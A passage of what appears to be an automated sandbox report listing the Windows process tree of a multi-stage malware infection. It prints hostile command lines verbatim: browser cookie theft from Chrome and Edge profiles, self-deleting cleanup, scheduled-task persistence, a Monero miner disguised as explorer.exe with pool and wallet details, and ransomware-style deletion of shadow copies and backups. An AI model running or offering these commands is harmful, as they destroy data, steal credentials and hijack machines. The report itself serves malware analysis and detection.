                                                                                                                                    PID:5344
                                                                                                                                    • C:\Users\Public\run.exe
                                                                                                                                      C:\Users\Public\run.exe
                                                                                                                                      4⤵
                                                                                                                                        PID:3132
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\run.exe"
                                                                                                                                          5⤵
                                                                                                                                            PID:5212
                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                              timeout /T 10 /NOBREAK
                                                                                                                                              6⤵
                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                              PID:2316
                                                                                                                                    • C:\Users\Admin\Documents\ErogKYpelLbl13EqC2lRHI7B.exe
                                                                                                                                      "C:\Users\Admin\Documents\ErogKYpelLbl13EqC2lRHI7B.exe"
                                                                                                                                      2⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:4864
                                                                                                                                      • C:\Users\Admin\Documents\ErogKYpelLbl13EqC2lRHI7B.exe
                                                                                                                                        "C:\Users\Admin\Documents\ErogKYpelLbl13EqC2lRHI7B.exe" -a
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:4664
                                                                                                                                    • C:\Users\Admin\Documents\jQF2eZ7KmXWk9gg4M9mRHA53.exe
                                                                                                                                      "C:\Users\Admin\Documents\jQF2eZ7KmXWk9gg4M9mRHA53.exe"
                                                                                                                                      2⤵
                                                                                                                                        PID:4448
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:1798690 "__IRAFN:C:\Users\Admin\Documents\jQF2eZ7KmXWk9gg4M9mRHA53.exe" "__IRCT:3" "__IRTSS:0" "__IRSID:S-1-5-21-3686645723-710336880-414668232-1000"
                                                                                                                                          3⤵
                                                                                                                                            PID:3684
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Sentry Framework\smartmap.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Sentry Framework\smartmap.exe"
                                                                                                                                              4⤵
                                                                                                                                                PID:5492
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im smartmap.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Roaming\Sentry Framework\smartmap.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                  5⤵
                                                                                                                                                    PID:4248
                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                      taskkill /im smartmap.exe /f
                                                                                                                                                      6⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      PID:2220
                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                      timeout /t 6
                                                                                                                                                      6⤵
                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                      PID:3132
                                                                                                                                            • C:\Users\Admin\Documents\ZfkotrZJ0PPhidLbbhV2TaAa.exe
                                                                                                                                              "C:\Users\Admin\Documents\ZfkotrZJ0PPhidLbbhV2TaAa.exe"
                                                                                                                                              2⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                              PID:2284
                                                                                                                                              • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:3412
                                                                                                                                              • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:4704
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                  4⤵
                                                                                                                                                    PID:4032
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                    4⤵
                                                                                                                                                      PID:4644
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                      4⤵
                                                                                                                                                        PID:4476
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                        4⤵
                                                                                                                                                          PID:1040
                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                        "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:5052
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                            4⤵
                                                                                                                                                              PID:4908
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                              4⤵
                                                                                                                                                                PID:5532
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:2784
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:5356
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:612
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:5556
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:4380
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:1228
                                                                                                                                                                    • C:\Users\Admin\Documents\5yI_vXvQBcVvZQPBmOamxNdr.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\5yI_vXvQBcVvZQPBmOamxNdr.exe"
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:2320
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:5872
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:5392
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:5892
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:1944
                                                                                                                                                                            • C:\Users\Admin\Documents\Mf4HYHXpcMqFlYJp0pluRHqe.exe
                                                                                                                                                                              "C:\Users\Admin\Documents\Mf4HYHXpcMqFlYJp0pluRHqe.exe"
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              PID:2276
                                                                                                                                                                              • C:\Users\Admin\Documents\Mf4HYHXpcMqFlYJp0pluRHqe.exe
                                                                                                                                                                                C:\Users\Admin\Documents\Mf4HYHXpcMqFlYJp0pluRHqe.exe
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:5660
                                                                                                                                                                                • C:\Users\Admin\Documents\Mf4HYHXpcMqFlYJp0pluRHqe.exe
                                                                                                                                                                                  C:\Users\Admin\Documents\Mf4HYHXpcMqFlYJp0pluRHqe.exe
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:5736
                                                                                                                                                                                • C:\Users\Admin\Documents\85yuuxLthDl3iqYZuGuClEOp.exe
                                                                                                                                                                                  "C:\Users\Admin\Documents\85yuuxLthDl3iqYZuGuClEOp.exe"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:4548
                                                                                                                                                                                    • C:\Users\Admin\Documents\85yuuxLthDl3iqYZuGuClEOp.exe
                                                                                                                                                                                      "C:\Users\Admin\Documents\85yuuxLthDl3iqYZuGuClEOp.exe"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:4852
                                                                                                                                                                                    • C:\Users\Admin\Documents\mLMZAF_xCMM2apI_5tFyhHaw.exe
                                                                                                                                                                                      "C:\Users\Admin\Documents\mLMZAF_xCMM2apI_5tFyhHaw.exe"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                      PID:4560
                                                                                                                                                                                    • C:\Users\Admin\Documents\zqr3HScWVHq9KRjOLlYXvqDK.exe
                                                                                                                                                                                      "C:\Users\Admin\Documents\zqr3HScWVHq9KRjOLlYXvqDK.exe"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:2640
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im zqr3HScWVHq9KRjOLlYXvqDK.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\zqr3HScWVHq9KRjOLlYXvqDK.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:2664
                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                            taskkill /im zqr3HScWVHq9KRjOLlYXvqDK.exe /f
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                            PID:2400
                                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                            timeout /t 6
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                            PID:4656
                                                                                                                                                                                      • C:\Users\Admin\Documents\an9JeUTOqYyF0SD0FpRbywcU.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\an9JeUTOqYyF0SD0FpRbywcU.exe"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:4780
                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:5924
                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                              schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                              PID:2160
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\services64.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:6128
                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                PID:3684
                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                  schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                  PID:5808
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:4872
                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                  C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.supportxmr.com:3333 --user=89UyhNJWGyP6xoycGBA3A6HjdNEs7g3jr34EXVtqGYzg5wLEbmZY2AcGy5Kw5NRfjaYTUyW1dKCHGinv7fGMg45zVCRQwNM --pass=30-60-miner --cpu-max-threads-hint=30 --cinit-idle-wait=5 --cinit-idle-cpu=60
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:5536
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS82B01114\sonia_6.exe
                                                                                                                                                                                              sonia_6.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                              PID:3120
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                PID:4296
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:4604
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:5748
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:5924
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS82B01114\sonia_4.exe
                                                                                                                                                                                                    sonia_4.exe
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                    PID:508
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS82B01114\sonia_2.exe
                                                                                                                                                                                                    sonia_2.exe
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                    PID:2732
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS82B01114\sonia_1.exe
                                                                                                                                                                                                    sonia_1.exe
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:1896
                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                      PID:4408
                                                                                                                                                                                                    • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                      PID:4388
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7972.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7972.exe
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:5728
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7972.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7972.exe
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:4724
                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                              icacls "C:\Users\Admin\AppData\Local\a866cfd2-9d70-473f-92d2-e5edce6bcad3" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                              PID:5860
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7972.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\7972.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:4928
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7972.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\7972.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:4916
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\868cf7f7-0869-4343-b712-686c433af1a2\build2.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\868cf7f7-0869-4343-b712-686c433af1a2\build2.exe"
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                        PID:5032
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\868cf7f7-0869-4343-b712-686c433af1a2\build2.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\868cf7f7-0869-4343-b712-686c433af1a2\build2.exe"
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                            PID:6000
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\868cf7f7-0869-4343-b712-686c433af1a2\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                PID:5496
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  taskkill /im build2.exe /f
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                  PID:3004
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                  timeout /t 6
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                  PID:4468
                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                    PID:4320
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:4544
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\A0E0.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\A0E0.exe
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:4816
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\BF66.exe
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\BF66.exe
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:5652
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\99E8.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\99E8.exe
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:5996
                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:4488
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\A2E2.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\A2E2.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              PID:4140
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im A2E2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\A2E2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:4936
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                    taskkill /im A2E2.exe /f
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                    PID:1020
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                    timeout /t 6
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                    PID:5236
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\C475.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\C475.exe
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:5980
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\C6E7.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\C6E7.exe
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:5480
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\DC06.exe
                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\DC06.exe
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:5164
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\E32B.exe
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\E32B.exe
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:5032
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\E7FF.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\E7FF.exe
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:6136
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\F07C.exe
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\F07C.exe
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:4656
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\5B.exe
                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\5B.exe
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:4972
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\677.exe
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\677.exe
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:4196
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\677.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\677.exe" -agent 0
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:5620
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:5528
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                                                                                        vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                        • Interacts with shadow copies
                                                                                                                                                                                                                                                        PID:4392
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:1824
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:5204
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:5860
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:4468
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                wmic shadowcopy delete
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:5196
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                                notepad.exe
                                                                                                                                                                                                                                                                2⤵
